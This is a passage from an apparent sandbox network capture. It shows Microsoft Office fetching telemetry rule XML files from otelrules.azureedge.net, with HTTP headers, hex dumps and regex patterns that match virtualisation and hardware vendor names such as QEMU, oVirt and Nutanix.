                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7fcrtpchC1DFW52e80000000kt000000000e65x
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:29 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.5 | 49762 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:29 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7flf9g6hC1DFWmcx8000000098g00000000emyb
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
2024-11-14 14:25:29 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.5 | 49761 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:29 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
2024-11-14 14:25:29 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:29 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142529Z-16547b76f7fvllnfhC1DFWxkg80000000kwg000000002pcd
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 419, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID: 54
Source IP: 192.168.2.5
Source Port: 49763
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120657v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:29 GMT
Content-Type: text/xml
Content-Length: 419
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
ETag: "0x8DC582B9FF95F80"
x-ms-request-id: 842612a7-c01e-00a2-75a0-342327000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142529Z-r178fb8d765w8fzdhC1DFW8ep400000002hg00000000dssp
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 419, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


Session ID: 55
Source IP: 192.168.2.5
Source Port: 49764
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120658v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:29 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
ETag: "0x8DC582BB650C2EC"
x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142529Z-16547b76f7fx6rhxhC1DFW76kg0000000ku0000000004pap
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
Timestamp: 2024-11-14 14:25:29 UTC, Bytes transferred: 472, Direction: IN, Data:
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID: 56
Source IP: 192.168.2.5
Source Port: 49765
Destination IP: 13.107.246.45
Destination Port: 443
Timestamp: 2024-11-14 14:25:30 UTC, Bytes transferred: 192, Direction: OUT, Data:
GET /rules/rule120659v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
Timestamp: 2024-11-14 14:25:30 UTC, Bytes transferred: 470, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:30 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3EAF226"
x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142530Z-16547b76f7fljddfhC1DFWeqbs00000000ug000000004kkg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.2.5 | 49766 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:30 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:30 GMT
Content-Type: text/xml
Content-Length: 485
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
ETag: "0x8DC582BB9769355"
x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142530Z-16547b76f7fnlcwwhC1DFWz6gw0000000kvg00000000ctzg
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:30 UTC | 485 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.2.5 | 49767 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:30 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:30 GMT
Content-Type: text/xml
Content-Length: 411
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
ETag: "0x8DC582B989AF051"
x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142530Z-16547b76f7flf9g6hC1DFWmcx8000000097g00000000gq6r
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:30 UTC | 411 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.5 | 49768 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:30 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:30 GMT
Content-Type: text/xml
Content-Length: 470
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
ETag: "0x8DC582BBB181F65"
x-ms-request-id: 44f8bb6f-a01e-001e-7911-3649ef000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142530Z-1749fc9bdbdjgplnhC1DFWhrks00000002cg00000000mgw1
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:30 UTC | 470 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.5 | 49769 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:30 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:30 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:30 GMT
Content-Type: text/xml
Content-Length: 427
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
ETag: "0x8DC582BB556A907"
x-ms-request-id: d980b71d-401e-000a-13a8-344a7b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142530Z-1749fc9bdbd85qw2hC1DFW157000000002sg00000000akhu
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:30 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.5 | 49770 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:31 UTC | 192 | OUT | GET /rules/rule120664v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:31 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:31 GMT
Content-Type: text/xml
Content-Length: 502
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
ETag: "0x8DC582BB6A0D312"
x-ms-request-id: 2d5e3293-901e-002a-4f00-2d7a27000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142531Z-16547b76f7fcrtpchC1DFW52e80000000krg00000000hdtf
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:31 UTC | 502 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.5 | 49771 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:31 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:31 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:31 GMT
Content-Type: text/xml
Content-Length: 407
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
ETag: "0x8DC582B9D30478D"
x-ms-request-id: 162cf1ac-401e-002a-0c09-2dc62e000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142531Z-16547b76f7fj897nhC1DFWdwq40000000kh000000000h1ar
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:31 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.2.5 | 49772 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:31 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:31 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:31 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3F48DAE"
x-ms-request-id: 806b7f82-201e-0003-669a-36f85a000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142531Z-16547b76f7fj5p7mhC1DFWf8w40000000kx0000000008qz7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:31 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.2.5 | 49773 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:31 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:31 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:31 GMT
Content-Type: text/xml
Content-Length: 408
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
ETag: "0x8DC582BB9B6040B"
x-ms-request-id: ed171e7d-901e-0015-69a2-34b284000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142531Z-1749fc9bdbd2jxtthC1DFWfk5w00000002fg00000000ga01
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:31 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.5 | 49774 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:31 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:31 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:31 GMT
Content-Type: text/xml
Content-Length: 469
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
ETag: "0x8DC582BB3CAEBB8"
x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142531Z-1749fc9bdbdns7kfhC1DFWb6c400000002q000000000dc1x
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:31 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.5 | 49775 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:32 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:32 GMT
Content-Type: text/xml
Content-Length: 416
Connection: close
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 6b1971c7-b01e-0053-1140-36cdf8000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142532Z-16547b76f7fm7xw6hC1DFW5px40000000kr0000000007zh4
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:32 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.5 | 49776 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:32 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:32 GMT
Content-Type: text/xml
Content-Length: 472
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91EAD002"
x-ms-request-id: 8514c3eb-001e-0082-0ba0-345880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142532Z-1749fc9bdbdjznvchC1DFWx4dc00000002m000000000317h
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:32 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.5 | 49777 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:32 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:32 GMT
Content-Type: text/xml
Content-Length: 432
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
ETag: "0x8DC582BAABA2A10"
x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T142532Z-16547b76f7fj897nhC1DFWdwq40000000kqg000000001xus
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-11-14 14:25:32 UTC | 432 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.5 | 49778 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:25:32 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:25:32 UTC | 491 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:25:32 GMT
Content-Type: text/xml
Content-Length: 475
Connection: close
Cache-Control: public, max-age=604800, immutable
